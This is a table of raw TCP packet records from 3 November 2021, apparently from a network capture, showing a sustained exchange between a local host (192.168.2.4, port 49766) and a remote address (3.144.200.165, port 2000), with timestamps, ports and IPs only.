Nov 3, 2021 14:44:40.648237944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648243904 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648257971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648277998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648287058 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648298979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648319006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648322105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648338079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648358107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648377895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648386955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648397923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648418903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648422003 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648438931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648458958 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648469925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648479939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648499966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648519039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648520947 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648540974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648549080 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648561001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648580074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648591995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648600101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648622990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648623943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648643970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648653984 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648663998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648684978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648689985 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648710966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648730993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648746967 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648751020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648772001 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648772955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648792028 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648813009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648832083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648838997 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648869038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648873091 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648890018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648910999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648931980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648936033 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648952007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648969889 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648972988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648993015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649005890 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649017096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649038076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649039030 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649060965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649081945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649091959 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649101973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649122000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649131060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649142981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649164915 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649199009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649219036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649239063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649241924 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649259090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649277925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649281979 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.649293900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649311066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649326086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.649394989 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.786973000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.787005901 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.787019968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.787036896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.787055016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.787125111 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.787156105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.789232016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.789339066 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794214010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794241905 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794258118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794272900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794290066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794307947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794323921 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794338942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794346094 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794354916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794369936 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794370890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794385910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794400930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794409990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794418097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794435024 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794435978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794450045 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794454098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794469118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794478893 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.794487000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.794531107 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.797538996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797566891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797580957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797596931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797616959 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797633886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797651052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797667027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797683954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797702074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797719002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797718048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.797736883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.797740936 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.797775030 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798240900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798263073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798279047 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798295975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798310995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798314095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798326969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798330069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798346996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798362970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798374891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798378944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798396111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798407078 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798412085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798428059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798429966 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798444033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798459053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798460007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798475981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798491001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798506975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798518896 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798522949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798540115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798554897 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798557997 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798571110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798583031 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798588991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798605919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798620939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798636913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798643112 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798654079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798683882 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798691034 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798706055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798721075 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798722982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798738956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798747063 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798754930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798770905 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798785925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798788071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798803091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798819065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798823118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798835993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798845053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798851967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798867941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798871040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798883915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798901081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798912048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798917055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798933029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798949003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798949957 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798964977 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798980951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.798985004 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.798996925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799011946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799016953 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799027920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799043894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799045086 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799058914 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799074888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799089909 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799092054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799108028 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799124002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799124002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799140930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799140930 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799156904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799171925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799174070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799190044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799205065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799215078 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799221039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799237967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799248934 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799254894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799271107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799271107 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799285889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799298048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799304008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799319029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799326897 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799335003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799350023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799367905 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799369097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799386024 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.799400091 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.799427032 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.938983917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.939088106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.939116955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.939143896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.939171076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.939169884 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.939207077 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.941329956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.941415071 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946055889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946090937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946119070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946146011 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946175098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946208000 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946218967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946228981 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946304083 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946332932 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946368933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946419954 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946472883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946508884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946544886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946557999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946578979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946614981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946630001 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946651936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946700096 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946779966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946820974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.946868896 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.946918964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.948960066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949014902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949045897 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.949052095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949089050 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949106932 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.949125051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949162960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949174881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.949197054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949225903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949254990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949294090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949330091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949363947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949397087 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.949400902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949434996 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.949436903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.949454069 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952400923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952447891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952485085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952522993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952527046 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952553034 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952558994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952596903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952621937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952634096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952668905 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952682972 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952707052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952744007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952755928 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952783108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952831030 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952871084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952915907 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952950954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.952974081 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.952986956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953023911 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953037024 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953058004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953094006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953109026 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953142881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953180075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953196049 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953214884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953249931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953264952 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953286886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953324080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953336000 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953362942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953398943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953411102 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953435898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953470945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953483105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953505993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953541994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953548908 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953578949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953615904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953654051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953676939 CET	49766	2000	192.168.2.4	3.144.200.165
